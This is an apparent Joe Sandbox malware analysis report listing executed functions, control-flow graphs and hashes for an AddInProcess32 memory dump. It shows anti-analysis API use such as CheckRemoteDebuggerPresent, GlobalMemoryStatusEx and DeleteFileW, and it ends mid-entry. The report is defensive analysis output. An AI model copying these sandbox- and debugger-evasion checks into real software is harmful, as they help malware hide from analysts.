                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 33e48d55f88e567b6898672d290c01df4343d325f0da49b6025b397cae56173d
                                                                                                                                                                                                                                                    • Instruction ID: 84e17a053b65fd18cd311d86a7df5a807462158f291b60d9048192cdb30712ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33e48d55f88e567b6898672d290c01df4343d325f0da49b6025b397cae56173d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5661267090CA894FDB46EF2888659A5BBF0FF56314B4501FBC44ACB593DE28B846C351
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:12.5%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:23
                                                                                                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                                                                                                    execution_graph 25993 12b099b 25994 12b091b 25993->25994 25995 12b084e 25993->25995 25995->25994 25997 12b137f 25995->25997 25999 12b138b 25997->25999 25998 12b14be 25998->25995 25999->25998 26001 12b8a20 25999->26001 26002 12b8a2a 26001->26002 26003 12b8a44 26002->26003 26006 669fa28 26002->26006 26010 669fa18 26002->26010 26003->25999 26008 669fa3d 26006->26008 26007 669fc52 26007->26003 26008->26007 26009 669fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 26008->26009 26009->26008 26011 669fa22 26010->26011 26012 669fc52 26011->26012 26013 669fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 26011->26013 26012->26003 26013->26011 26014 12b8848 26015 12b888e DeleteFileW 26014->26015 26017 12b88c7 26015->26017 26018 12b70c8 26019 12b710c CheckRemoteDebuggerPresent 26018->26019 26020 12b714e 26019->26020

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 066955A8 Relevance: 1.8, Strings: 1, Instructions: 592COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 609 66955a8-66955c5 610 66955c7-66955ca 609->610 611 66955d0-66955d3 610->611 612 66956f2-66956fb 610->612 613 66955f0-66955f3 611->613 614 66955d5-66955eb 611->614 615 669572d-6695736 612->615 616 66956fd 612->616 617 66955fd-6695600 613->617 618 66955f5-66955f8 613->618 614->613 619 6695738-6695740 615->619 620 669577d-66957ab 615->620 621 6695702-6695705 616->621 624 6695602-6695605 617->624 625 6695645-669564b 617->625 618->617 619->620 623 6695742-6695752 619->623 640 66957b5-66957b8 620->640 626 669571b-669571e 621->626 627 6695707-6695716 621->627 623->620 632 6695754-6695758 623->632 633 6695629-669562c 624->633 634 6695607-6695624 624->634 630 669564d 625->630 631 6695686-6695690 625->631 628 6695728-669572b 626->628 629 6695720-6695723 626->629 627->626 628->615 636 669575d-669575f 628->636 629->628 637 6695652-6695655 630->637 649 6695697-6695699 631->649 632->636 638 669562e-669563b 633->638 639 6695640-6695643 633->639 634->633 646 6695761 636->646 647 6695766-6695769 636->647 642 669565f-6695662 637->642 643 6695657-669565a 637->643 638->639 639->625 639->637 644 66957da-66957dd 640->644 645 66957ba-66957be 640->645 650 6695670-6695673 642->650 651 6695664-6695669 642->651 643->642 655 66957df-66957e6 644->655 656 66957f1-66957f4 644->656 652 66958aa-66958e4 645->652 653 66957bf-66957cc 645->653 646->647 647->610 654 669576f-669577c 647->654 657 669569e-66956a1 649->657 660 6695681-6695684 650->660 661 6695675-669567c 650->661 651->618 659 669566b 651->659 677 66958e6-66958e9 652->677 653->652 662 66957cd-66957d9 653->662 664 66957ec 655->664 665 66958a2-66958a9 655->665 666 6695816-6695819 656->666 667 66957f6-66957fa 656->667 668 66956ab-66956ae 657->668 669 66956a3-66956a8 657->669 659->650 660->631 660->657 661->660 662->644 664->656 673 669581b-669581f 666->673 674 6695837-669583a 666->674 667->652 675 6695800-6695808 667->675 671 66956bf-66956c2 668->671 672 66956b0-66956b4 668->672 669->668 680 66956de-66956e1 671->680 681 66956c4-66956d9 671->681 672->654 678 66956ba 672->678 673->652 679 6695825-669582d 673->679 682 669583c-6695843 674->682 683 6695844-6695847 674->683 675->652 676 669580e-6695811 675->676 676->666 686 66958eb-66958fe 677->686 687 6695901-6695904 677->687 678->671 679->652 688 669582f-6695832 679->688 689 66956ed-66956f0 680->689 690 66956e3-66956ec 680->690 681->680 684 6695849-6695853 683->684 685 6695858-669585b 683->685 684->685 691 669585d-669586e 685->691 692 6695873-6695876 685->692 694 669590e-6695911 687->694 695 6695906-669590b 687->695 688->674 689->612 689->621 691->692 698 6695878-669587c 692->698 699 6695890-6695892 692->699 700 669592b-669592e 694->700 701 6695913-6695924 694->701 695->694 698->652 703 669587e-6695886 698->703 704 6695899-669589c 699->704 705 6695894 699->705 706 669593c-669593f 700->706 707 6695930-6695937 700->707 714 669599d-66959a4 701->714 715 6695926 701->715 703->652 710 6695888-669588b 703->710 704->640 704->665 705->704 708 6695959-669595c 706->708 709 6695941-6695952 706->709 707->706 712 669595e-6695961 708->712 713 66959b2-6695b46 708->713 709->714 721 6695954 709->721 710->699 718 669597b-669597e 712->718 719 6695963-6695974 712->719 758 6695c7c-6695c8f 713->758 759 6695b4c-6695b53 713->759 716 66959a9-66959ac 714->716 715->700 716->713 720 6695c92-6695c95 716->720 723 6695998-669599b 718->723 724 6695980-6695991 718->724 719->701 730 6695976 719->730 720->713 726 6695c9b-6695c9e 720->726 721->708 723->714 723->716 724->714 734 6695993 724->734 727 6695cbc-6695cbe 726->727 728 6695ca0-6695cb1 726->728 732 6695cc0 727->732 733 6695cc5-6695cc8 727->733 728->686 738 6695cb7 728->738 730->718 732->733 733->677 736 6695cce-6695cd7 733->736 734->723 738->727 760 6695b59-6695b8c 759->760 761 6695c07-6695c0e 759->761 772 6695b8e 760->772 773 6695b91-6695bd2 760->773 761->758 762 6695c10-6695c43 761->762 774 6695c48-6695c75 762->774 775 6695c45 762->775 772->773 783 6695bea-6695bf1 773->783 784 6695bd4-6695be5 773->784 774->736 775->774 786 6695bf9-6695bfb 783->786 784->736 786->736
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                                    • Opcode ID: 4edf0b2d7b70c93d830d535313e487f253c36e67dce5186b6c46195efa9c5465
                                                                                                                                                                                                                                                    • Instruction ID: 29cd69b85cce2dca9dddd8eb33c74ba085c570328593988e6eb95f7235f808a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4edf0b2d7b70c93d830d535313e487f253c36e67dce5186b6c46195efa9c5465
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90221735E002189FDF65DB65C5906AEBBB6FF84320F248469D816EB394DB31EC41CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06692353 Relevance: 1.0, Instructions: 1007COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e19d5880bd454b03519c1bdc426eae234ec7a9814597ecd8b692d33283fe66bb
                                                                                                                                                                                                                                                    • Instruction ID: 468c085a37d7964fca073933f4fb2f7e31910c3fb9c9337432562f8bbe243b9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e19d5880bd454b03519c1bdc426eae234ec7a9814597ecd8b692d33283fe66bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB926634E102089FDB64DB68C594A5DBBFAFB49310F54C4A9D809AB351DB35ED82CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 066965E8 Relevance: .8, Instructions: 818COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bec4789bd25091f80c0e8621984a28e495d2cf097c3d69fd1aa5556f74322ef6
                                                                                                                                                                                                                                                    • Instruction ID: ac824c3e0af09ad01184aa53b43aa2656ea5ff97d96100cf68513fd143e85a59
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bec4789bd25091f80c0e8621984a28e495d2cf097c3d69fd1aa5556f74322ef6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5629234A002099FEF54DB68D594BADB7B6FF84314F148469E806DB394DB35EC86CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669C170 Relevance: .6, Instructions: 644COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2293 669c170-669c190 2294 669c192-669c195 2293->2294 2295 669c19f-669c1a2 2294->2295 2296 669c197-669c19a 2294->2296 2297 669c1af-669c1b2 2295->2297 2298 669c1a4-669c1aa 2295->2298 2296->2295 2299 669c1d5-669c1d8 2297->2299 2300 669c1b4-669c1d0 2297->2300 2298->2297 2301 669c4dc-669c4e5 2299->2301 2302 669c1de-669c1e1 2299->2302 2300->2299 2305 669c4eb 2301->2305 2306 669c412-669c41b 2301->2306 2303 669c1eb-669c1ee 2302->2303 2304 669c1e3-669c1e8 2302->2304 2308 669c1f0-669c1f7 2303->2308 2309 669c202-669c205 2303->2309 2304->2303 2310 669c4f0-669c4f2 2305->2310 2311 669c50d-669c545 2306->2311 2312 669c421-669c425 2306->2312 2313 669c1fd 2308->2313 2314 669c405-669c408 2308->2314 2318 669c230-669c233 2309->2318 2319 669c207-669c22b 2309->2319 2315 669c4f9-669c4fc 2310->2315 2316 669c4f4 2310->2316 2329 669c547-669c54a 2311->2329 2317 669c42a-669c42d 2312->2317 2313->2309 2321 669c40d-669c410 2314->2321 2315->2294 2324 669c502-669c50c 2315->2324 2316->2315 2322 669c42f-669c451 2317->2322 2323 669c456-669c459 2317->2323 2326 669c240-669c243 2318->2326 2327 669c235-669c23b 2318->2327 2319->2318 2321->2306 2321->2317 2322->2323 2330 669c45b-669c480 2323->2330 2331 669c485-669c488 2323->2331 2332 669c2a5-669c2a8 2326->2332 2333 669c245-669c2a0 2326->2333 2327->2326 2337 669c54c-669c55a 2329->2337 2338 669c561-669c564 2329->2338 2330->2331 2334 669c48a-669c4ae 2331->2334 2335 669c4b3-669c4b6 2331->2335 2339 669c2c9-669c2cc 2332->2339 2340 669c2aa-669c2c4 2332->2340 2333->2332 2334->2335 2347 669c4b8-669c4d2 2335->2347 2348 669c4d7-669c4da 2335->2348 2361 669c55c 2337->2361 2362 669c5bf-669c5d8 2337->2362 2345 669c587-669c58a 2338->2345 2346 669c566-669c582 2338->2346 2342 669c2ce-669c2df 2339->2342 2343 669c2e4-669c2e7 2339->2343 2340->2339 2342->2343 2352 669c2e9-669c2f2 2343->2352 2353 669c304-669c307 2343->2353 2355 669c58c-669c596 2345->2355 2356 669c597-669c59a 2345->2356 2346->2345 2347->2348 2348->2301 2348->2310 2352->2311 2360 669c2f8-669c2ff 2352->2360 2363 669c309-669c31a 2353->2363 2364 669c31f-669c322 2353->2364 2369 669c5ba-669c5bd 2356->2369 2370 669c59c-669c5b5 2356->2370 2360->2353 2361->2338 2386 669c5f7-669c603 2362->2386 2399 669c5da-669c5e4 2362->2399 2363->2364 2372 669c333-669c336 2364->2372 2373 669c324-669c32e 2364->2373 2369->2362 2375 669c5e5-669c5e7 2369->2375 2370->2369 2381 669c338-669c346 2372->2381 2382 669c351-669c354 2372->2382 2373->2372 2377 669c5e9 2375->2377 2378 669c5ee-669c5f1 2375->2378 2377->2378 2378->2329 2378->2386 2381->2296 2402 669c34c 2381->2402 2389 669c35e-669c361 2382->2389 2390 669c356-669c359 2382->2390 2392 669c609-669c612 2386->2392 2393 669c7a3-669c7ad 2386->2393 2396 669c363-669c37d 2389->2396 2397 669c382-669c385 2389->2397 2390->2389 2400 669c618-669c638 2392->2400 2401 669c7ae-669c7c6 2392->2401 2396->2397 2403 669c3b1-669c3b4 2397->2403 2404 669c387-669c3ac 2397->2404 2427 669c63e-669c647 2400->2427 2428 669c791-669c79d 2400->2428 2417 669c7c8-669c7c9 2401->2417 2418 669c7ca-669c7e6 2401->2418 2402->2382 2405 669c3df-669c3e8 2403->2405 2406 669c3b6-669c3b9 2403->2406 2404->2403 2405->2352 2412 669c3ee 2405->2412 2409 669c3bb-669c3d5 2406->2409 2410 669c3da-669c3dd 2406->2410 2409->2410 2410->2405 2415 669c3f3-669c3f6 2410->2415 2412->2415 2423 669c3f8-669c3fd 2415->2423 2424 669c400-669c403 2415->2424 2417->2418 2419 669c7e8-669c7eb 2418->2419 2425 669c7f1-669c7ff 2419->2425 2426 669c9a7-669c9aa 2419->2426 2423->2424 2424->2314 2424->2321 2434 669c806-669c808 2425->2434 2430 669c9cd-669c9cf 2426->2430 2431 669c9ac-669c9c8 2426->2431 2427->2401 2433 669c64d-669c67c call 6696598 2427->2433 2428->2392 2428->2393 2435 669c9d1 2430->2435 2436 669c9d6-669c9d9 2430->2436 2431->2430 2450 669c6be-669c6d4 2433->2450 2451 669c67e-669c6b6 2433->2451 2438 669c80a-669c80d 2434->2438 2439 669c81f-669c849 2434->2439 2435->2436 2436->2419 2440 669c9df-669c9e8 2436->2440 2438->2440 2448 669c99c-669c9a6 2439->2448 2449 669c84f-669c858 2439->2449 2452 669c85e-669c96d call 6696598 2449->2452 2453 669c975-669c99a 2449->2453 2456 669c6f2-669c708 2450->2456 2457 669c6d6-669c6ea 2450->2457 2451->2450 2452->2449 2502 669c973 2452->2502 2453->2440 2465 669c70a-669c71e 2456->2465 2466 669c726-669c739 2456->2466 2457->2456 2465->2466 2472 669c73b-669c745 2466->2472 2473 669c747 2466->2473 2476 669c74c-669c74e 2472->2476 2473->2476 2477 669c77f-669c78b 2476->2477 2478 669c750-669c755 2476->2478 2477->2427 2477->2428 2480 669c763 2478->2480 2481 669c757-669c761 2478->2481 2482 669c768-669c76a 2480->2482 2481->2482 2482->2477 2484 669c76c-669c778 2482->2484 2484->2477 2502->2448
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e05ec1a949d03c1add1d42231451574e803d634fe9471dac6af63b7241a5b99a
                                                                                                                                                                                                                                                    • Instruction ID: 43f343181c7a4db6c458f21621dfb044085991c177c3ffd1b564d0fe233f7677
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e05ec1a949d03c1add1d42231451574e803d634fe9471dac6af63b7241a5b99a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9832A234B002089FDF64DB68D490BAEB7B6FB88310F508525E805EB355DB75EC92CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669B217 Relevance: .6, Instructions: 566COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3ac8494ba0e1460de69504adc6130f728fb7084b9eead0df634deb765bd333cb
                                                                                                                                                                                                                                                    • Instruction ID: 5532da4efcc7ea3ca84334891404ac12b653f232fe50ff0aaadd6079951bd76b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ac8494ba0e1460de69504adc6130f728fb7084b9eead0df634deb765bd333cb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C22A770E102099FEF64DB69E4907AFB7B6FB45310F64852AE845DB391CA34EC81CB61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06693068 Relevance: .5, Instructions: 545COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 97f35e5047450b97188a8a8a76dcdc9dfdffbee2b2fa7b868907726594b8462d
                                                                                                                                                                                                                                                    • Instruction ID: 92a2b9a892efadcb3605651ae388306d916a8a93db155c47e755587767cb82b0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97f35e5047450b97188a8a8a76dcdc9dfdffbee2b2fa7b868907726594b8462d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1321D30E10619CFDB15EF65C8906ADB7B6FF99300F6086A9D409BB354EB70A985CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06697D78 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7ce9479225b7047c027bf67c9349dfcfc7efacb69d1871b9ef5b655751362608
                                                                                                                                                                                                                                                    • Instruction ID: 48a4333b07217a314fe3fba920b91e71ff6555bc929e77297f995c5a11e0ae5c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ce9479225b7047c027bf67c9349dfcfc7efacb69d1871b9ef5b655751362608
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12027F30B002098FDF54DB68D490BAEBBA6FF85310F548969D815DB395DB75EC82CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0669A398 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 528 669a398-669a39d 530 669a349-669a358 528->530 531 669a39f-669a3c8 528->531 533 669a35a-669a35d 530->533 532 669a3ca-669a3cd 531->532 536 669a3cf-669a3eb 532->536 537 669a3f0-669a3f3 532->537 534 669a37f-669a381 533->534 535 669a35f 533->535 538 669a388-669a38b 534->538 539 669a383 534->539 542 669a36b-669a37a 535->542 536->537 540 669a400-669a403 537->540 541 669a3f5-669a3ff 537->541 544 669a38d-669a391 538->544 545 669a310-669a313 538->545 539->538 546 669a409-669a436 call 6692068 540->546 547 669a534-669a537 540->547 542->534 548 669a335-669a338 545->548 549 669a315-669a330 545->549 577 669a529-669a533 546->577 578 669a43c-669a461 546->578 550 669a539-669a552 547->550 551 669a557-669a55a 547->551 548->533 556 669a33a-669a355 548->556 549->548 550->551 552 669a55c-669a56a 551->552 553 669a571-669a574 551->553 559 669a57a-669a610 call 6692068 552->559 568 669a56c 552->568 553->559 560 669a621-669a623 553->560 556->533 559->546 592 669a616-669a620 559->592 564 669a62a-669a62d 560->564 565 669a625 560->565 564->532 571 669a633-669a63c 564->571 565->564 568->553 585 669a46b 578->585 586 669a463-669a469 578->586 588 669a471-669a523 call 6696598 call 6692068 585->588 586->588 588->577 588->578
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: X!@$x!@
                                                                                                                                                                                                                                                    • API String ID: 0-2527372166
                                                                                                                                                                                                                                                    • Opcode ID: 8b17353fb9e465e530c1b143862bb4871798a60f364eb17df4a8e235277d8f3e
                                                                                                                                                                                                                                                    • Instruction ID: 4dc2dac7040312a162177c2ca9b9d040ddfc7998da0b6995b03f7c2d2c72537e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b17353fb9e465e530c1b143862bb4871798a60f364eb17df4a8e235277d8f3e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38818131F102089FDF54EBA9E4906ADB7F6EF88310F508969E816E7354DB319C86CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 012BF38B Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 919 12bf38b-12bf3a3 920 12bf3cd-12bf3e3 919->920 921 12bf3a5-12bf3cc 919->921 943 12bf3e5 call 12bf38b 920->943 944 12bf3e5 call 12bf470 920->944 924 12bf3ea-12bf3ec 925 12bf3ee-12bf3f1 924->925 926 12bf3f2-12bf451 924->926 933 12bf453-12bf456 926->933 934 12bf457-12bf46e 926->934 936 12bf472-12bf4e4 GlobalMemoryStatusEx 934->936 937 12bf470-12bf471 934->937 939 12bf4ed-12bf515 936->939 940 12bf4e6-12bf4ec 936->940 937->936 940->939 943->924 944->924
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e780b4ba36493d52e601f4eb0b4471312b1d4863bdd6222572c7f27736d39ab5
                                                                                                                                                                                                                                                    • Instruction ID: 9515cf223da50afb341b802c8c39b54b00e8a79bfb02bb6ccba003a4929a589e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e780b4ba36493d52e601f4eb0b4471312b1d4863bdd6222572c7f27736d39ab5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58412332D143998FCB14CFA9D8407EEBBF5EF89210F14856AD504A7242DB789885CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 012B70C1 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 945 12b70c1-12b714c CheckRemoteDebuggerPresent 947 12b714e-12b7154 945->947 948 12b7155-12b7190 945->948 947->948
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 012B713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: 028b408d41c7da7ecc1e967df513b2e56c8181295cd509aa81dc2f91560e78c3
                                                                                                                                                                                                                                                    • Instruction ID: 710a1fd3a37a42921d10dad69b13e109988643cbf3d109218a54f724c1e2bf98
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 028b408d41c7da7ecc1e967df513b2e56c8181295cd509aa81dc2f91560e78c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B32166B2C002598FDB14CFAAD484BEEBBF5EF48320F14846AE855A7251D7789945CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 012B70C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 951 12b70c8-12b714c CheckRemoteDebuggerPresent 953 12b714e-12b7154 951->953 954 12b7155-12b7190 951->954 953->954
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 012B713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2516510513.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_12b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: a0c4e576d38b069957184addd190c02bc669fafc3390bdf2183de74c21bbce96
                                                                                                                                                                                                                                                    • Instruction ID: 2fdf27cf0c22cf1119b53e3e2fac38f35592b6ae121968eeaa9e63ad530de769
